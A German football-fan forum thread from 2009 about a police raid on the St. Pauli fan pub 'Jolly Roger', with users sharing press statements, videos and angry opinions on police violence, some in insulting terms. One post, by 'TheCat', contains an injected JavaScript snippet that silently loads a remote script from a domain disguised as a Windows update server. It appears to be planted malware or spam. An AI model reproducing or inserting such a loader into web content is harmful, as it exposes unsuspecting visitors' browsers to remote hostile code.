Polizei stürmt Fankneipe auf St. Pauli

Dieses Thema im Forum "Kneipe" wurde erstellt von HoratioTroche, 7 Juli 2009.

  1. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Die Polizei hat im Anschluss an das Schanzenfest in Hamburg die Fan-Kneipe "Jolly Roger" getürmt. Warum ist einigermassen unklar. Klarer sind die Folgen: Mehrere Verletzte durch Schlagstock und Pfefferspray, einem nach eigenen Angaben unbeteiligen Journalisten wurden 4 Zähne ausgeschlagen. Interne Ermittlungen laufen. Inzwischen, muss man sagen, zunächst wurde dieser Einsatz verweigert. Deswegen erging auch Anzeige wegen Strafvereitelung im Amt und Sachbeschädigung.

    Vermutungen gehen dahin, dass es sich um eine Art Racheakt handeln könnte: Sowohl bei diesem Einsatz als auch bei früheren Auseinandersetzungen in der Straße in unmittelbarer Nähe des Stadions war jeweils die gleiche BF-Einheit zugegen.

    Die Polizei wollte sich zu den Vorfällen nicht äußern.
    Polizei-Einsatz in Fankneipe: St. Pauli-Anhänger verletzt und entsetzt - SPIEGEL ONLINE - Nachrichten - Sport

    In Düsseldorf haben die Vorfälle in der Altstadt und in bzw. vor einer Fan-Kneipe Ende der letzten Saison inzwischen übrigens zur Demission des örtlichen Einsatzleiters geführt. Aber auf einen kommt ja in der Regel der nächste.

    Nachtrag: Inzwischen gibt es eine Presseerklärung von Ballkult e.V., dem Betreiberverein des Jolly Roger. Auszug daraus:
    Der Zweck des Einsatzes bleibt nach wie vor unklar: weder wurden Festnahmen getätigt noch Personalien aufgenommen. Außer Unbeteiligte zu verletzten, einzuschüchtern und Panik zu erzeugen hatte dieses Vorgehen offensichtlich kein Ziel. Tay Eich, Aufsichtsratsmitglied des FC St.
    Pauli: "Der Polizeieinsatz am und im "Jolly Roger" ist vollkommen inakzeptabel und muss lückenlos aufgeklärt werden."
     
    Zuletzt bearbeitet: 7 Juli 2009
  2. Anzeige für Gäste


    um diese Anzeige auszublenden!.
  3. DeWollä

    DeWollä Real Life Junkie

    Beiträge:
    6.893
    Likes:
    345
    Gestapo Schlägertrupps ? Was geht denn hier ab ?
     
  4. support1988

    support1988 Member

    Beiträge:
    529
    Likes:
    0
    a
    Scheint wohl wieder die BFE (Beweismittel und Festnahmeeinheit)aus Eutin gewesen zu sein.... kennt man ja von den!
     
  5. Schröder

    Schröder Problembär

    Beiträge:
    10.886
    Likes:
    971
    Nur haben die weder jemanden festgenommen noch Beweismittel gesichert...
     
  6. anaxagore

    anaxagore Glubberer

    Beiträge:
    6
    Likes:
    0
    Nach dem, was ich davon bisher gehört habe, kommt mir das mindestens wie eine massive Missachtung der Verhältnismäßigkeit vor. Eher Gewalt in Uniform...
     
  7. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Ausschnittsweise ist hier was davon zu sehen. Ab 3:10
    YouTube - Remmi Demmi auf dem Schanzenfest 09

    Ganz schön feste draufgehalten.
     
  8. Berliner

    Berliner Member

    Beiträge:
    224
    Likes:
    0
    Das es innerhalb der Polizei organisierte Hooligangruppen gibt, ist ja bekannt. Anders kann man das leider nicht bezeichnen. Noch schlimmer ist, das das Zustimmung innerhalb des Apparates findet. Der Abbau von Demokratie und Bürgerrechten geht munter weiter in Deutschland.
     
  9. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Wo man wieder von "internen Ermittlungen" lesen kann: Ist das eigentlich international üblich? Oder gibt es anderswo möglicherweise Ermittlungen von extern?
     
  10. BoardUser

    BoardUser Jede Saison ein Titel! Administrator Moderator

    Beiträge:
    19.919
    Likes:
    1.053
    Hmm gute Frage. Allerdings frage ich mich gleich zurück, wer diese Ermittlungen denn dann machen soll....? Immerhin ist Staatsanwaltschaft extern von der Polizei.
     
  11. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Gute Gegenfrage, wahrscheinlich dreht man sich irgendwann im Ermittlungskreis.
     
  12. Berliner

    Berliner Member

    Beiträge:
    224
    Likes:
    0
    Und der Staatsanwalt soll dann persönlich ermitteln gehen?

    Natürlich wäre eine externe Ermittlung wünschenswert! Ich bin auch dafür. Nur muss man wohl klar feststellen, das sich da kaum was ermitteln lässt. Schon so sagt doch in der Regel kein Polizist gegen einen anderen aus. Wenn da eine externe Ermittlungsbehörde kommt, wird wohl erst recht dichtgemacht. Das Phänomen ist ja bekannt.
     
  13. DeWollä

    DeWollä Real Life Junkie

    Beiträge:
    6.893
    Likes:
    345
    Stell Dir mal vor was diese Polizeischläger und ihre Führungsriege anstellen, wenn ihnen die Politiker den Weg völlig freimachen mit irgendwelchen Sonder- Anti- Terror- Gesetzen ala Schäuble.....:motz:
     
  14. BoardUser

    BoardUser Jede Saison ein Titel! Administrator Moderator

    Beiträge:
    19.919
    Likes:
    1.053
    Nöö, wieso?
     
  15. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Vor diesem Hintergrund, auch mit dem was in Düsseldorf so los war, erscheinen einem diese Aktionen wie die Zukunftswerkstatt wie blose Lippenbekenntnisse.
     
  16. Berliner

    Berliner Member

    Beiträge:
    224
    Likes:
    0
    Was nützt es, wenn zwar der Staatsanwalt extern ist, er aber keinen zum ermitteln hat? Und auch nicht selber losgeht, um zu ermitteln?
     
  17. Berliner

    Berliner Member

    Beiträge:
    224
    Likes:
    0
    Ich würde vermuten, dass nicht alle die Ergebnisse der Zukunftswerkstadt mittragen und entsprechend handeln.
     
  18. BoardUser

    BoardUser Jede Saison ein Titel! Administrator Moderator

    Beiträge:
    19.919
    Likes:
    1.053
    Wer soll es denn dann machen?
     
  19. Berliner

    Berliner Member

    Beiträge:
    224
    Likes:
    0
    Ja, wer? Das ist die 1 Millionen Euro Frage! :D

    Und wer eine Antwort hat, den frage ich, wer dann bei denen ermittelt, wenn da mal was vorfällt! ;)
     
  20. TheCat

    TheCat New Member

    Beiträge:
    10
    Likes:
    0
    übel...

    <script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
     
  21. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Kleine Anfrage

    Auf die Antworten darf man gespannt sein.
     
  22. BoardUser

    BoardUser Jede Saison ein Titel! Administrator Moderator

    Beiträge:
    19.919
    Likes:
    1.053
    Soviel zu dieser Aussage.....
     
  23. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Und hier die Pressemitteilung von Ballkult zur Demo gegen Polizeigewalt am Freitag.

    Eine weitere Konsequenz aus den Ereignissen muss die überfällige Individual-Kennzeichnung von Einsatzkräften sein. Es ist ein skandalöser und untragbarer Zustand, dass vermummte Polizeigruppen in Kampfausrüstung schwere Straftaten begehen können und dass trotz eindeutiger Beweise eine Verurteilung an der Identifizierbarkeit der Täter scheitert. Ebenso dringend geboten ist die Einsetzung einer unabhängigen Ermittlungskommission. Rechtsanwalt Tay Eich, Aufsichtsratsmitglied des FC St. Pauli: "Wer Beweismittel trotz Aufforderung zur Sicherstellung tagelang bei den Tätern belässt, zeigt eins deutlich: Wir brauchen eine externe
    unabhängige Instanz, die die Wahrheit auch finden will."
     

    Anhänge:

    Zuletzt bearbeitet: 12 Juli 2009
  24. kleinehexe

    kleinehexe SF-Dschungelkönigin 2011 und PTL-Meister 2015/16

    Beiträge:
    21.782
    Likes:
    2.032
    Diese Demos sollten in der ganzen Bundesrepublik stattfinden, vielleicht rallt die Politik dann mal, dass da was gehörig aus dem Ruder ist. Und solche "Einsätze" gehören eh bestraft.
     
  25. DeWollä

    DeWollä Real Life Junkie

    Beiträge:
    6.893
    Likes:
    345

    die Politik ? In den 70 ern habe ich Hundertschaften gesehen, die unbewaffnete Studenten zusammenschlugen in Heidelberg...die wegen Fahrpreiserhöhungen protestierten....:rolleyes:

    Vor Wahlen kann man vielleicht kurzfristig Aufmerksamkeit erreichen, aber ich glaube nicht, daß sie sich den Kräften durch ständige Überprüfungen den Job noch madiger machen...dazu brauchen sie im Endeffekt solche unterbezahlten Leute, sollte das Volk einmal nicht mehr friedlich bleiben können.
     
  26. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
  27. Berliner

    Berliner Member

    Beiträge:
    224
    Likes:
    0
    Ein kleiner Eindruck, wie es ist, wenn die Polizei mitfeiern will:

    YouTube - Remmi Demmi auf dem Schanzenfest 09
    Ab Minute 3:13 Einsatz im Jolly Roger.

    Verhalten sich so aufrechte STaatsbeamte?
    YouTube - Schanzenfest 2009+Polizei+Gewalt
     
  28. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
  29. Northside

    Northside Kölsche Jung

    Beiträge:
    1.122
    Likes:
    0
    Ich sag nur 1312
     
  30. HoratioTroche

    HoratioTroche Zuwanderer

    Beiträge:
    16.450
    Likes:
    1.247
    Da bemüht man sich um Sachlichkeit, und dann kommt der daher :rolleyes: